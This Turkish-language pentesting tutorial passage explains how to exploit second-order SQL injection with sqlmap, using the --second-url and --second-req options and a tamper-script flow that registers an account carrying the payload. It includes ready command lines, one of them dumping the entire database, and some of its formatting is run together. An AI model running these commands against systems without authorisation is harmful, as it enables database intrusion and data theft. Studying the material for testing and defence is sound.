SQLMap, İkinci Derece SQLi'leri sömürebilir.
Sağlamanız gerekenler:
Sql enjeksiyon yükünün kaydedileceği istek
Yükünyürütüleceği istek
Sql enjeksiyon yükünün kaydedildiği istek, sqlmap'teki diğer enjeksiyonlar gibi belirtilir. Enjeksiyonun çıktısını/çalışmasını okuyabileceği istek, --second-url veya bir dosyadan tam bir isteği belirtmeniz gerekiyorsa --second-req ile belirtilebilir.
Basit ikinci derece örnek:
#Get the SQL payload execution with a GET to a urlsqlmap-rlogin.txt-pusername--second-url"http://10.10.10.10/details.php"#Get the SQL payload execution sending a custom request from a filesqlmap-rlogin.txt-pusername--second-reqdetails.txt
Birkaç durumda bu yeterli olmayabilir çünkü farklı bir sayfaya erişmek ve payload göndermek dışında başka eylemler gerçekleştirmeniz gerekebilir.
Bunu gerektiğinde bir sqlmap değiştirici kullanabilirsiniz. Örneğin, aşağıdaki komut dosyası, sqlmap payload'ını e-posta olarak kullanarak yeni bir kullanıcı kaydeder ve oturumu kapatır.
Her zaman bir enjeksiyon denemesiyle başlamadan önce bir SQLMap değiştirici çalıştırılır ve bir payload döndürmesi gerekmektedir. Bu durumda, payload ile ilgilenmiyoruz, ancak bazı istekler göndermekle ilgileniyoruz, bu nedenle payload değiştirilmez.
Bu nedenle, ikinci dereceden SQL enjeksiyonunu sömürmek için daha karmaşık bir akışa ihtiyacımız olduğunda:
"email" alanı içinde SQLi payload'ını içeren bir hesap oluşturun
Çıkış yapın
Bu hesapla giriş yapın (login.txt)
SQL enjeksiyonunu gerçekleştirmek için bir istek gönderin (second.txt)
Bu sqlmap satırı yardımcı olacaktır:
sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a
########### --tamper tamper.py : Indicates the tamper to execute before trying each SQLipayload# -r login.txt : Indicates the request to send the SQLi payload# -p email : Focus on email parameter (you can do this with an "email=*" inside login.txt# --second-req second.txt : Request to send to execute the SQLi and get the ouput# --proxy http://127.0.0.1:8080 : Use this proxy# --technique=U : Help sqlmap indicating the technique to use# --dbms mysql : Help sqlmap indicating the dbms# --prefix "a2344r3F'" : Help sqlmap detecting the injection indicating the prefix# --union-char "DTEC" : Help sqlmap indicating a different union-char so it can identify the vuln# -a : Dump all